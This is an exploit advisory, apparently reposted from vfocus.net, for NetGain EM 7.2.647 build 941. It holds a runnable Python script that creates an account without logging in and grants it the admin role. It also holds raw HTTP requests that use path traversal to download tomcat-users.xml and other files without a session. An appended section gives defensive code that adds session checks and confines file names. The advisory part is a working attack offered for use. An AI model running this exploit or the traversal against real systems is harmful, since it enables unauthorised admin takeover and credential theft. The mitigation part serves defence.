NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion
Source: vfocus.net  Author: f3ci  Published: 2017-05-25
'''
# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
Add User Account with Admin Privilege without Login
----------------------------------------------
We can create a user and grant it the admin privilege without logging in,
because the application does not check the session on these requests.
 
 
Local File Inclusion
----------------------------------------------
Normal Request:
 
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=iossd.log
 
Changing the value of the filename parameter lets us download other files,
and this request also works without logging in.
 
Example:
 
POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=../../tomcat/conf/tomcat-users.xml
'''
#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
import requests
import sys
 
try:
    # Command-line arguments: target IP, port, and the credentials of the
    # account to create. A missing argument raises IndexError, handled below.
    ip = str(sys.argv[1])
    port = str(sys.argv[2])
    user = str(sys.argv[3])
    passwd = str(sys.argv[4])
 
    def create():
        # Step 1: user_save_do.jsp accepts a new account without any session cookie.
        print("\033[1;32m[+]\033[1;m Try to Create user")
        url = "http://" + ip + ":" + port + "/u/jsp/security/user_save_do.jsp"
        data = {
            'new': "true",
            'id': "",
            'name': user,
            'dname': "foobar",
            'password': passwd,
            'password2': passwd,
            'description': "",
            'emails': "foo@bar.com",
            'mobileNumber': "000000",
            'loginAttempts': "5",
        }
        response = requests.post(url, data=data)
        if response.status_code == 200:
            print("\033[1;32m[+]\033[1;m Success!!")
            role()
        else:
            print("\033[91m[-]\033[91;m Create User Failed")
 
    def role():
        # Step 2: role_save_do.jsp has no session check either; it saves the
        # "admin" role with the new user and the built-in admin as its members.
        print("\033[1;32m[+]\033[1;m Get admin role")
        url = "http://" + ip + ":" + port + "/u/jsp/security/role_save_do.jsp"
        data = {
            'name': "admin",
            'description': "Administrator",
            'users': [user, "admin"],  # requests sends a list as repeated form fields
        }
        response = requests.post(url, data=data)
        if response.status_code == 200:
            print("\033[1;32m[+]\033[1;m Success!!")
            print("\033[1;32m[+]\033[1;m Login with user:" + user + " password:" + passwd)
        else:
            print("\033[91m[-]\033[91;m Get admin role Failed")
 
    create()
 
except IndexError:
    # Only a missing argument reaches here; network errors are left to surface.
    print("\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0]))
    print("\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0]))
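Both findings above come down to two missing server-side controls: the three endpoints accept requests with no session, and download_do.jsp passes the filename parameter to the filesystem unchecked. The block below is an added example of how a fix looks from the defender's side; it is not the advisory's code and not NetGain's. It models the servlet request with a small Request class, assumes the session carries "user" and "role" fields, and assumes a policy that only bare ".log" names may be served from the log directory; all of those are assumptions made for the example.

```python
from dataclasses import dataclass
from pathlib import Path
import tempfile
from typing import Optional

# Endpoints named in the advisory above. All three must sit behind a login
# check; the advisory shows they currently accept requests with no session.
PRIVILEGED = {
    "/u/jsp/security/user_save_do.jsp",
    "/u/jsp/security/role_save_do.jsp",
    "/u/jsp/log/download_do.jsp",
}

# File types the log download handler may serve (assumed policy).
ALLOWED_SUFFIXES = (".log",)


@dataclass
class Request:
    """Minimal stand-in for the servlet request; constructed for this example."""
    path: str
    form: dict
    session: Optional[dict] = None  # None: no (valid) JSESSIONID presented


def safe_log_path(log_dir: Path, requested: str) -> Path:
    """Confine a user-supplied ``filename`` to ``log_dir``.

    Deny-by-default: the value must be a bare file name (no '/', no '\\'
    since the product runs on Windows, no NUL, not '.' or '..'), carry an
    allowed suffix, and after symlink resolution still sit directly under
    ``log_dir``. Anything else raises PermissionError.
    """
    if not requested or any(c in requested for c in "/\\\x00"):
        raise PermissionError(f"path separators not allowed: {requested!r}")
    if requested in (".", "..") or not requested.endswith(ALLOWED_SUFFIXES):
        raise PermissionError(f"not a log file name: {requested!r}")
    base = log_dir.resolve()
    target = (base / requested).resolve()
    if target.parent != base:
        raise PermissionError(f"escapes log directory: {requested!r}")
    return target


def handle(req: Request, log_dir: Path) -> tuple:
    """Dispatch with the two missing controls in place: the session gate
    first (plus an admin check for the security pages), then filename
    confinement for the download endpoint. Returns (status, detail)."""
    if req.path in PRIVILEGED:
        if not req.session or not req.session.get("user"):
            return (401, "login required")
        if req.path.startswith("/u/jsp/security/") and req.session.get("role") != "admin":
            return (403, "admin role required")
    if req.path == "/u/jsp/log/download_do.jsp":
        try:
            target = safe_log_path(log_dir, req.form.get("filename", ""))
        except PermissionError as exc:
            return (400, str(exc))
        return (200, str(target))
    return (200, "ok")


def demo() -> list:
    """Replay the advisory's requests against the hardened dispatcher and
    return the resulting status codes. All inputs are constructed here."""
    log_dir = Path(tempfile.mkdtemp())
    admin = {"user": "admin", "role": "admin"}
    traversal = "../../tomcat/conf/tomcat-users.xml"
    cases = [
        # Unauthenticated traversal from the advisory: stopped by the session gate
        Request("/u/jsp/log/download_do.jsp", {"filename": traversal}),
        # Same traversal from a logged-in admin: stopped by the path check
        Request("/u/jsp/log/download_do.jsp", {"filename": traversal}, admin),
        # The legitimate request from the advisory
        Request("/u/jsp/log/download_do.jsp", {"filename": "iossd.log"}, admin),
        # Unauthenticated account creation: stopped by the session gate
        Request("/u/jsp/security/user_save_do.jsp", {"new": "true", "name": "foobar"}),
        # Logged-in non-admin trying to save the admin role: stopped by the role check
        Request("/u/jsp/security/role_save_do.jsp", {"name": "admin"}, {"user": "foobar", "role": "user"}),
        # Windows-style separators are rejected as well
        Request("/u/jsp/log/download_do.jsp", {"filename": "..\\..\\conf\\x.log"}, admin),
    ]
    return [handle(r, log_dir)[0] for r in cases]


if __name__ == "__main__":
    print(demo())  # [401, 400, 200, 401, 403, 400]
```

The order of the checks matters: the session gate runs before any parameter is looked at, so an unauthenticated request never reaches the filesystem code, and the path check resolves both the base directory and the target before comparing them, which also catches a symlink planted inside the log directory.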
 